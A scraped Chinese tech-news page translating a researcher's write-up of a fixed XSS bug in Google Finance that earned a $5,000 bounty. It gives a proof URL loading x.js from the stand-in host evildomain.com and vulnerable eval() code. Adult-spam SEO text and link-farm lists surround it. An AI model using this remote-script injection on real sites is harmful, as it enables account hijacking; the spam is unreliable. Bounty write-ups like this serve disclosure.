成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

在谷歌財經發現一個XSS漏洞,拿5千美元獎勵

開發 項目管理
這個問題出現在Google Finance中(google.com/finance)。它能欺騙Javascript的走勢圖應用(源文件為/finance/f/sfe- opt.js),讓其載入一個托管在外部域上的文件,然后通過eval()方法將該文件內容轉換成Javascript代碼并執行。

我們在6月13日發了一篇資訊, 說“Google調整漏洞獎勵計劃,單個漏洞***獎勵7,500美元”。7月30日看到 Michele Spagnuolo 發的博文稱“他在 Google Finance 上發現并提交了一個 XSS 漏洞,谷歌安全團隊確認并修復了該漏洞。Michele 因此拿到了 5K 美元獎勵。” 以下是 Michele 博文的譯文。

這個問題出現在Google Finance中(google.com/finance)。它能欺騙Javascript的走勢圖應用(源文件為/finance/f/sfe- opt.js),讓其載入一個托管在外部域上的文件,然后通過eval()方法將該文件內容轉換成Javascript代碼并執行。

這個過程不需要用戶交互,只要點擊一下URL就可以了。

復現步驟:

1)點擊該URL(目前已修復):

https://www.google.com/finance?chdet=1214596800000&q=NASDAQ:INTC&ntsp=2&ntrssurl=https://evildomain.com/x.js.

文件x.js包含下列驗證代碼用來演示:

  1. alert(document.domain); 

該文件必須通過https來托管。

2)遠程Javascript被執行。

工作原理

以下是 /finance/f/sfe-opt.js中的兩個代碼片段,它們引起了這個安全問題。

  1. c.push("ntsp="); 
  2. c.push(b); 
  3. if (b == Vl.jj || b == Vl.kj) a = a.xc[ii(a.S)], a.lj() || (c.push("&ntrssurl="), c.push(escape(a.Cc || ""))); 
  4. return c.join("") 

在上面這段代碼中,URL參數,更確切的說是ntrssurl參數(用戶RSS源的地址)被獲取并進行了連接。

  1. Xi.prototype.send = function (a, b, c, d) { 
  2.     a = a || null; 
  3.     d = d || "_" + (Yi++).toString(36) + x().toString(36); 
  4.     n._callbacks_ || (n._callbacks_ = {}); 
  5.     var e = this.$s.Z(); 
  6.     if (a) 
  7.         for (var f in a) a.hasOwnProperty && !a.hasOwnProperty(f) || Fi(e, f, a[f]); 
  8.     b && (n._callbacks_[d] = Zi(d, b), Fi(e, this.Zs, "_callbacks_." + d)); 
  9.     b = Wi(e.toString(), { 
  10.         timeout: this.We, 
  11.         Ns: !0 
  12.     }); 
  13.     Si(b, null, $i(d, a, c), void 0); 
  14.     return { 
  15.         La: d, 
  16.         Du: b 
  17.     } 
  18. }; 

第二段代碼負責在外部域中查詢新聞源以將內容顯示在走勢圖中。

它生成一個回調函數名,以字串 “?_CALLBACK_”結尾。函數Wi對URL中的ntrssurl參數中的域名執行xmlhttprequest操作。

然后,返回了一段簡單的Javascript代碼,并且通過eval()方法將其執行。

http://s2.51cto.com/wyfs01/M00/14/03/wKioJlIBrH-h6OtvAAEZKFDEOAg537.jpg

觸發XSS漏洞的截圖

callback 請求截圖

有漏洞的代碼片段

這個安全隱患很快就被修復了,我因此得到了5000美元的獎勵。

非常感謝,Google安全小組!

原文鏈接:http://miki.it/blog/2013/7/30/xss-in-google-finance/

譯文鏈接:http://blog.jobbole.com/44953/

責任編輯:陳四芳 來源: 伯樂在線
相關推薦

2021-02-07 00:05:27

谷歌漏洞網絡安全

2021-03-15 09:50:01

漏洞網絡安全網絡攻擊

2020-12-09 19:31:57

Chrome谷歌漏洞

2010-04-30 15:45:09

2022-09-09 18:37:56

漏洞賞金開源

2020-10-09 07:49:17

黑客

2020-10-14 10:39:50

漏洞網絡攻擊網絡安全

2015-02-10 14:32:37

XSS漏洞XSS

2015-01-04 15:36:52

XSS漏洞XSS

2012-07-31 09:22:23

2015-03-26 14:04:57

2021-12-07 23:11:15

漏洞微軟谷歌

2022-01-26 07:47:22

黑客漏洞網絡安全

2010-06-11 17:08:05

2018-05-23 09:28:23

2013-05-13 10:24:44

谷歌開發團隊開發管理

2024-08-29 15:09:09

2022-09-01 13:48:01

漏洞獎勵計劃漏洞

2021-10-22 12:48:40

漏洞網絡安全網絡攻擊

2022-02-12 17:35:13

漏洞漏洞賞金谷歌
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 九七午夜剧场福利写真 | 在线播放国产一区二区三区 | 久久影音先锋 | 日日夜夜精品视频 | 黄色电影在线免费观看 | 亚洲精品视频在线观看视频 | 浮生影院免费观看中文版 | 国产三级国产精品 | 久久久av | 国产欧美性成人精品午夜 | 亚洲在线一区二区三区 | 欧美一级二级在线观看 | 色网站在线 | 精品视频在线播放 | 日韩成人av在线 | 亚洲精品无 | 国产午夜在线 | 特级黄色毛片 | 久久久久久中文字幕 | 国产wwwcom| 国产高潮av| 亚洲国产一区二区视频 | 午夜羞羞 | 91久久久久久 | 97精品国产97久久久久久免费 | 欧美电影网 | 91麻豆精品国产91久久久资源速度 | 欧美毛片免费观看 | 国产区视频在线观看 | 午夜在线小视频 | 午夜影院在线免费观看视频 | 国产成人网 | 久久日韩粉嫩一区二区三区 | 久久狠狠 | 成人精品一区亚洲午夜久久久 | 日韩精品亚洲专区在线观看 | 色婷婷久久 | 精品久久久久久久久久 | 91精品国产91久久久久久丝袜 | 久久久久网站 | 亚洲网站在线观看 |